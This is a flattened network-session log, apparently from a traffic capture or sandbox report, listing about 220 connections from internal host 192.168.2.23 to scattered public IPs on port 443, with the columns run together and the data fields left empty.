                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12873192.168.2.2335900138.188.69.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12874192.168.2.233652851.136.45.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12875192.168.2.234512682.163.42.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12876192.168.2.23475449.223.57.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12877192.168.2.234758298.80.102.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12878192.168.2.2336972148.34.180.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12879192.168.2.2360334222.141.207.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12880192.168.2.2340882158.131.142.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12881192.168.2.2346578139.83.25.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12882192.168.2.2349892151.60.59.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12883192.168.2.2349592124.59.47.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12884192.168.2.2359712109.142.167.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12885192.168.2.2334408112.17.122.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12886192.168.2.234819067.158.17.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12887192.168.2.234160634.193.182.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12888192.168.2.234023024.143.134.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12889192.168.2.2356500141.190.171.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12890192.168.2.2351882102.150.33.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12891192.168.2.235923274.226.251.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12892192.168.2.2337494217.212.150.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12893192.168.2.2344580174.134.59.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12894192.168.2.235903286.216.28.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12895192.168.2.234807820.37.254.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12896192.168.2.2358434213.75.220.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12897192.168.2.233842812.249.20.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12898192.168.2.2337046120.110.213.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12899192.168.2.2354640105.165.70.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12900192.168.2.2343792105.174.76.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12901192.168.2.234443064.16.113.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12902192.168.2.234891048.6.180.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12903192.168.2.2333340167.220.81.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12904192.168.2.2334322195.130.12.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12905192.168.2.233454447.187.25.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12906192.168.2.2350850187.229.231.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12907192.168.2.235600660.34.140.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12908192.168.2.235485247.75.16.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12909192.168.2.2358848165.14.120.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12910192.168.2.235571879.184.150.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12911192.168.2.235707012.8.134.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12912192.168.2.2346258219.173.109.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12913192.168.2.2335264130.104.163.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12914192.168.2.2349074211.127.161.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12915192.168.2.235543012.69.252.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12916192.168.2.2339314155.126.31.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12917192.168.2.2347742133.228.216.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12918192.168.2.2356908110.252.87.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12919192.168.2.2339998197.121.242.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12920192.168.2.233839075.117.33.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12921192.168.2.2339282107.163.104.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12922192.168.2.235266277.149.11.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12923192.168.2.235273425.73.191.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12924192.168.2.235835042.144.161.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12925192.168.2.2360590170.185.96.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12926192.168.2.2348076221.180.19.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12927192.168.2.2349104149.144.221.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12928192.168.2.2346210190.53.211.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12929192.168.2.2357870174.115.74.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12930192.168.2.2353294177.54.53.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12931192.168.2.2340330129.124.228.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12932192.168.2.236077264.199.175.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12933192.168.2.2354094179.114.209.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12934192.168.2.2349144211.231.220.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12935192.168.2.23413825.171.254.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12936192.168.2.2338886147.69.189.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12937192.168.2.234230843.165.167.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12938192.168.2.2338440209.155.165.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12939192.168.2.2360244138.118.104.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12940192.168.2.2346018188.220.119.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12941192.168.2.2351530142.252.241.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12942192.168.2.2350702183.48.138.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12943192.168.2.235489046.236.134.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12944192.168.2.2353984157.165.108.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12945192.168.2.2346882193.115.212.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12946192.168.2.2352798151.248.167.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12947192.168.2.2351316128.59.204.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12948192.168.2.2344350165.38.240.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12949192.168.2.2358994103.197.30.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12950192.168.2.2336830139.111.94.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12951192.168.2.2358976109.183.172.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12952192.168.2.2334786174.157.63.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12953192.168.2.2343038198.16.185.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12954192.168.2.235327425.160.12.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12955192.168.2.2346134216.203.125.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12956192.168.2.2333852205.201.57.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12957192.168.2.233924072.136.85.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12958192.168.2.236046850.153.241.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12959192.168.2.235804677.192.95.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12960192.168.2.2349640160.13.125.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12961192.168.2.2354364198.24.231.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12962192.168.2.2343392138.59.137.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12963192.168.2.2352468126.255.250.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12964192.168.2.2343138151.103.137.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12965192.168.2.2337506218.159.110.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12966192.168.2.235024042.8.239.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12967192.168.2.2355162177.93.160.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12968192.168.2.2355364109.105.130.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12969192.168.2.235995273.218.181.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12970192.168.2.2337486107.235.49.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12971192.168.2.2333424168.250.252.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12972192.168.2.233806885.203.43.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12973192.168.2.2360564180.87.194.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12974192.168.2.2347146219.246.103.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12975192.168.2.236081862.42.111.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12976192.168.2.2336436189.43.110.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12977192.168.2.235966819.97.208.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12978192.168.2.234016813.241.207.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12979192.168.2.2358830181.76.149.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12980192.168.2.2334956189.19.31.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12981192.168.2.235333286.60.238.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12982192.168.2.2343914203.121.239.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12983192.168.2.23565809.70.165.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12984192.168.2.2352452142.171.223.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12985192.168.2.235505654.172.190.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12986192.168.2.2335038110.134.186.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12987192.168.2.2335918218.240.245.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12988192.168.2.2339810124.220.82.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12989192.168.2.235400880.25.159.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12990192.168.2.2356642223.251.43.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12991192.168.2.2354648148.60.234.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12992192.168.2.2357662102.178.103.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12993192.168.2.2346886188.145.57.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12994192.168.2.2360388104.185.18.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12995192.168.2.233554249.214.196.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12996192.168.2.2336544177.211.250.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12997192.168.2.233803890.93.29.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12998192.168.2.2334752168.151.151.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12999192.168.2.236059266.1.213.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13000192.168.2.2334878203.251.201.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13001192.168.2.235351684.147.174.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13002192.168.2.235012666.109.53.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13003192.168.2.2347618148.22.208.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13004192.168.2.233360025.93.9.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13005192.168.2.2359064171.67.28.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13006192.168.2.233564484.155.113.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13007192.168.2.2354232143.241.146.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13008192.168.2.234546482.188.123.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13009192.168.2.2345084189.87.196.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13010192.168.2.2358222216.192.246.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13011192.168.2.2347034101.131.60.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13012192.168.2.23480029.47.167.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13013192.168.2.2355918106.221.190.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13014192.168.2.2353588182.38.76.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13015192.168.2.2354928186.83.81.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13016192.168.2.2342274150.169.110.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13017192.168.2.2352792132.114.235.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13018192.168.2.2357566192.253.115.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13019192.168.2.234424299.108.171.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13020192.168.2.23549661.106.254.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13021192.168.2.2351844140.44.144.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13022192.168.2.2358606209.106.84.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13023192.168.2.234727435.173.217.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13024192.168.2.2336488198.229.6.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13025192.168.2.2349380209.24.224.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13026192.168.2.234864499.105.105.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13027192.168.2.2335802155.115.149.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13028192.168.2.233475838.179.239.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13029192.168.2.2342314191.53.105.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13030192.168.2.2346136137.253.241.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13031192.168.2.2333878160.43.15.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13032192.168.2.2346930186.100.143.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13033192.168.2.2347194223.88.149.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13034192.168.2.2355830150.90.146.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13035192.168.2.2356260205.168.100.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13036192.168.2.233776490.121.163.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13037192.168.2.234525667.241.210.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13038192.168.2.2335702169.84.228.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13039192.168.2.235546887.29.133.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13040192.168.2.234527027.129.36.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13041192.168.2.235908419.239.70.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13042192.168.2.2352980194.243.173.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13043192.168.2.2333710163.189.48.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13044192.168.2.234517073.224.103.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13045192.168.2.2352718180.123.248.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13046192.168.2.2356882197.98.234.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13047192.168.2.233652872.181.120.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13048192.168.2.235046277.7.138.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13049192.168.2.2352422179.210.59.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13050192.168.2.2357062218.224.44.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13051192.168.2.2357774168.181.246.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13052192.168.2.2339724139.42.148.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13053192.168.2.2341492185.206.71.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13054192.168.2.23576069.215.26.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13055192.168.2.2340454124.214.197.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13056192.168.2.235794259.162.41.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13057192.168.2.2348718189.128.248.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13058192.168.2.2342828158.218.212.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13059192.168.2.234767645.70.44.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13060192.168.2.2351764221.227.189.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13061192.168.2.234556657.191.49.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13062192.168.2.2358342115.40.160.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13063192.168.2.2358532123.231.9.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13064192.168.2.234368644.245.37.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13065192.168.2.2336682207.254.31.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13066192.168.2.2359084211.184.54.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13067192.168.2.234947086.253.172.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13068192.168.2.2358340163.147.175.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13069192.168.2.2343174213.75.29.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13070192.168.2.2342436188.234.7.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13071192.168.2.2343926147.31.153.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13072192.168.2.2343368159.139.19.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13073192.168.2.2341742108.38.176.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13074192.168.2.2335546164.172.65.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13075192.168.2.235163614.161.244.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13076192.168.2.2341476132.27.133.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13077192.168.2.2346170169.244.126.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13078192.168.2.2351072132.63.193.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13079192.168.2.234227877.26.242.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13080192.168.2.2351614131.208.129.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13081192.168.2.2341946153.35.223.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13082192.168.2.235807618.19.192.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13083192.168.2.234124075.147.129.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13084192.168.2.2337868180.192.201.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13085192.168.2.2348992163.180.150.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13086192.168.2.234162893.180.8.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13087192.168.2.235695613.8.159.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13088192.168.2.234314480.128.161.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13089192.168.2.235377648.104.13.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13090192.168.2.2352412106.242.166.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13091192.168.2.2360806210.116.114.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13092192.168.2.233462458.111.25.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13093192.168.2.234526625.155.12.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13094192.168.2.235863854.10.62.243443
